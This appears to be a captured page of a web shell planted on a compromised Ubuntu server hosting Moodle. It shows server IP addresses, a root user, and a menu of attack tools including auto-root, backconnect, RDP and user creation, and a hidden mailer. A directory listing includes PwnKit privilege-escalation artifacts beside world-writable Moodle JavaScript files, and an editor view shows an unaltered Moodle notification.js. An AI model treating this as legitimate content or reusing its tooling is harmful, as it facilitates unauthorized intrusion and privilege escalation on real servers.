Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.51
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
moodle /
lib /
amd /
src /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
emoji
[ DIR ]
drwxrwxrwx
local
[ DIR ]
drwxrwxrwx
.mad-root
0
B
-rw-r--r--
adapter.js
190.74
KB
-rwxrwxrwx
addblockmodal.js
2.56
KB
-rwxrwxrwx
ajax.js
10.09
KB
-rwxrwxrwx
auto_rows.js
3.5
KB
-rwxrwxrwx
autoscroll.js
6.54
KB
-rwxrwxrwx
backoff_timer.js
5.12
KB
-rwxrwxrwx
chart_axis.js
7.43
KB
-rwxrwxrwx
chart_bar.js
3.13
KB
-rwxrwxrwx
chart_base.js
11.41
KB
-rwxrwxrwx
chart_builder.js
1.67
KB
-rwxrwxrwx
chart_line.js
2.13
KB
-rwxrwxrwx
chart_output.js
1.1
KB
-rwxrwxrwx
chart_output_base.js
2.09
KB
-rwxrwxrwx
chart_output_chartjs.js
10.95
KB
-rwxrwxrwx
chart_output_htmltable.js
3.36
KB
-rwxrwxrwx
chart_pie.js
3.09
KB
-rwxrwxrwx
chart_series.js
8.41
KB
-rwxrwxrwx
chartjs-lazy.js
670.93
KB
-rwxrwxrwx
chartjs.js
933
B
-rwxrwxrwx
checkbox-toggleall.js
12.78
KB
-rwxrwxrwx
config.js
1.05
KB
-rwxrwxrwx
custom_interaction_events.js
22.29
KB
-rwxrwxrwx
dragdrop.js
13.01
KB
-rwxrwxrwx
drawer.js
3.37
KB
-rwxrwxrwx
drawer_events.js
987
B
-rwxrwxrwx
event.js
3.99
KB
-rwxrwxrwx
first.js
1.38
KB
-rwxrwxrwx
form-autocomplete.js
50.91
KB
-rwxrwxrwx
form-cohort-selector.js
2.56
KB
-rwxrwxrwx
form-course-selector.js
3.87
KB
-rwxrwxrwx
fragment.js
4.72
KB
-rwxrwxrwx
fullscreen.js
1.66
KB
-rwxrwxrwx
icon_system.js
2.52
KB
-rwxrwxrwx
icon_system_fontawesome.js
3.95
KB
-rwxrwxrwx
icon_system_standard.js
2.29
KB
-rwxrwxrwx
inplace_editable.js
13.31
KB
-rwxrwxrwx
key_codes.js
1.38
KB
-rwxrwxrwx
loadingicon.js
3.89
KB
-rwxrwxrwx
localstorage.js
2.1
KB
-rwxrwxrwx
log.js
1.76
KB
-rwxrwxrwx
loglevel.js
9.66
KB
-rwxrwxrwx
modal.js
29.18
KB
-rwxrwxrwx
modal_backdrop.js
4.48
KB
-rwxrwxrwx
modal_cancel.js
1.44
KB
-rwxrwxrwx
modal_events.js
1.25
KB
-rwxrwxrwx
modal_factory.js
8.05
KB
-rwxrwxrwx
modal_registry.js
2.4
KB
-rwxrwxrwx
modal_save_cancel.js
2.14
KB
-rwxrwxrwx
mustache.js
26.69
KB
-rwxrwxrwx
network.js
6.78
KB
-rwxrwxrwx
notification.js
8.72
KB
-rwxrwxrwx
page_global.js
5.4
KB
-rwxrwxrwx
paged_content.js
2.87
KB
-rwxrwxrwx
paged_content_events.js
1.17
KB
-rwxrwxrwx
paged_content_factory.js
20.68
KB
-rwxrwxrwx
paged_content_pages.js
11.75
KB
-rwxrwxrwx
paged_content_paging_bar.js
20.34
KB
-rwxrwxrwx
paged_content_paging_bar_limit...
2.36
KB
-rwxrwxrwx
paged_content_paging_dropdown....
7.36
KB
-rwxrwxrwx
pending.js
1.59
KB
-rwxrwxrwx
permissionmanager.js
9.82
KB
-rwxrwxrwx
popover_region_controller.js
12.58
KB
-rwxrwxrwx
popper.js
79.2
KB
-rwxrwxrwx
prefetch.js
4.61
KB
-rwxrwxrwx
pubsub.js
2.17
KB
-rwxrwxrwx
pwnkit
10.99
KB
-rwxr-xr-x
search-input.js
3.24
KB
-rwxrwxrwx
sessionstorage.js
2.24
KB
-rwxrwxrwx
showhidesettings.js
11.83
KB
-rwxrwxrwx
sortable_list.js
29.51
KB
-rwxrwxrwx
storagewrapper.js
5.17
KB
-rwxrwxrwx
str.js
6.13
KB
-rwxrwxrwx
tag.js
19.79
KB
-rwxrwxrwx
templates.js
49.68
KB
-rwxrwxrwx
toast.js
2.72
KB
-rwxrwxrwx
tooltip.js
4.1
KB
-rwxrwxrwx
tree.js
18.06
KB
-rwxrwxrwx
truncate.js
6.6
KB
-rwxrwxrwx
url.js
3.69
KB
-rwxrwxrwx
user_date.js
9.34
KB
-rwxrwxrwx
userfeedback.js
2.91
KB
-rwxrwxrwx
utils.js
2.69
KB
-rwxrwxrwx
yui.js
1.15
KB
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : notification.js
// This file is part of Moodle - http://moodle.org/ // // Moodle is free software: you can redistribute it and/or modify // it under the terms of the GNU General Public License as published by // the Free Software Foundation, either version 3 of the License, or // (at your option) any later version. // // Moodle is distributed in the hope that it will be useful, // but WITHOUT ANY WARRANTY; without even the implied warranty of // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the // GNU General Public License for more details. // // You should have received a copy of the GNU General Public License // along with Moodle. If not, see <http://www.gnu.org/licenses/>. import Pending from 'core/pending'; import Log from 'core/log'; let currentContextId = M.cfg.contextid; const notificationTypes = { success: 'core/notification_success', info: 'core/notification_info', warning: 'core/notification_warning', error: 'core/notification_error', }; const notificationRegionId = 'user-notifications'; const Selectors = { notificationRegion: `#${notificationRegionId}`, fallbackRegionParents: [ '#region-main', '[role="main"]', 'body', ], }; const setupTargetRegion = () => { let targetRegion = getNotificationRegion(); if (targetRegion) { return false; } const newRegion = document.createElement('span'); newRegion.id = notificationRegionId; return Selectors.fallbackRegionParents.some(selector => { const targetRegion = document.querySelector(selector); if (targetRegion) { targetRegion.prepend(newRegion); return true; } return false; }); }; /** * Poll the server for any new notifications. * * @returns {Promise} */ export const fetchNotifications = async() => { const Ajax = await import('core/ajax'); return Ajax.call([{ methodname: 'core_fetch_notifications', args: { contextid: currentContextId } }])[0] .then(addNotifications); }; /** * Add all of the supplied notifications. * * @param {Array} notifications The list of notificaitons * @returns {Promise} */ const addNotifications = notifications => { if (!notifications.length) { return Promise.resolve(); } const pendingPromise = new Pending('core/notification:addNotifications'); notifications.forEach(notification => renderNotification(notification.template, notification.variables)); return pendingPromise.resolve(); }; /** * Add a notification to the page. * * Note: This does not cause the notification to be added to the session. * * @param {Object} notification The notification to add. * @param {string} notification.message The body of the notification * @param {string} notification.type The type of notification to add (error, warning, info, success). * @param {Boolean} notification.closebutton Whether to show the close button. * @param {Boolean} notification.announce Whether to announce to screen readers. * @returns {Promise} */ export const addNotification = notification => { const pendingPromise = new Pending('core/notification:addNotifications'); let template = notificationTypes.error; notification = { closebutton: true, announce: true, type: 'error', ...notification, }; if (notification.template) { template = notification.template; delete notification.template; } else if (notification.type) { if (typeof notificationTypes[notification.type] !== 'undefined') { template = notificationTypes[notification.type]; } delete notification.type; } return renderNotification(template, notification) .then(pendingPromise.resolve); }; const renderNotification = async(template, variables) => { if (typeof variables.message === 'undefined' || !variables.message) { Log.debug('Notification received without content. Skipping.'); return; } const pendingPromise = new Pending('core/notification:renderNotification'); const Templates = await import('core/templates'); Templates.renderForPromise(template, variables) .then(({html, js = ''}) => { Templates.prependNodeContents(getNotificationRegion(), html, js); return; }) .then(pendingPromise.resolve) .catch(exception); }; const getNotificationRegion = () => document.querySelector(Selectors.notificationRegion); /** * Alert dialogue. * * @param {String|Promise} title * @param {String|Promise} message * @param {String|Promise} cancelText * @returns {Promise} */ export const alert = async(title, message, cancelText) => { var pendingPromise = new Pending('core/notification:alert'); const ModalFactory = await import('core/modal_factory'); return ModalFactory.create({ type: ModalFactory.types.ALERT, body: message, title: title, buttons: { cancel: cancelText, }, removeOnClose: true, }) .then(function(modal) { modal.show(); pendingPromise.resolve(); return modal; }); }; /** * The confirm has now been replaced with a save and cancel dialogue. * * @param {String|Promise} title * @param {String|Promise} question * @param {String|Promise} saveLabel * @param {String|Promise} noLabel * @param {String|Promise} saveCallback * @param {String|Promise} cancelCallback * @returns {Promise} */ export const confirm = (title, question, saveLabel, noLabel, saveCallback, cancelCallback) => saveCancel(title, question, saveLabel, saveCallback, cancelCallback); /** * The Save and Cancel dialogue helper. * * @param {String|Promise} title * @param {String|Promise} question * @param {String|Promise} saveLabel * @param {String|Promise} saveCallback * @param {String|Promise} cancelCallback * @returns {Promise} */ export const saveCancel = async(title, question, saveLabel, saveCallback, cancelCallback) => { const pendingPromise = new Pending('core/notification:confirm'); const [ ModalFactory, ModalEvents, ] = await Promise.all([ import('core/modal_factory'), import('core/modal_events'), ]); return ModalFactory.create({ type: ModalFactory.types.SAVE_CANCEL, title: title, body: question, buttons: { // Note: The noLabel is no longer supported. save: saveLabel, }, removeOnClose: true, }) .then(function(modal) { modal.show(); modal.getRoot().on(ModalEvents.save, saveCallback); modal.getRoot().on(ModalEvents.cancel, cancelCallback); pendingPromise.resolve(); return modal; }); }; /** * Wrap M.core.exception. * * @param {Error} ex */ export const exception = async ex => { const pendingPromise = new Pending('core/notification:displayException'); // Fudge some parameters. if (!ex.stack) { ex.stack = ''; } if (ex.debuginfo) { ex.stack += ex.debuginfo + '\n'; } if (!ex.backtrace && ex.stacktrace) { ex.backtrace = ex.stacktrace; } if (ex.backtrace) { ex.stack += ex.backtrace; const ln = ex.backtrace.match(/line ([^ ]*) of/); const fn = ex.backtrace.match(/ of ([^:]*): /); if (ln && ln[1]) { ex.lineNumber = ln[1]; } if (fn && fn[1]) { ex.fileName = fn[1]; if (ex.fileName.length > 30) { ex.fileName = '...' + ex.fileName.substr(ex.fileName.length - 27); } } } if (typeof ex.name === 'undefined' && ex.errorcode) { ex.name = ex.errorcode; } const Y = await import('core/yui'); Y.use('moodle-core-notification-exception', function() { var modal = new M.core.exception(ex); modal.show(); pendingPromise.resolve(); }); }; /** * Initialise the page for the suppled context, and displaying the supplied notifications. * * @param {Number} contextId * @param {Array} notificationList * @param {Boolean} userLoggedIn */ export const init = (contextId, notificationList, userLoggedIn) => { currentContextId = contextId; // Setup the message target region if it isn't setup already setupTargetRegion(); // Add provided notifications. addNotifications(notificationList); // If the user is not logged in then we can not fetch anything for them. if (userLoggedIn) { // Perform an initial poll for any new notifications. fetchNotifications(); } }; // To maintain backwards compatability we export default here. export default { init, fetchNotifications, addNotification, alert, confirm, saveCancel, exception, };
Close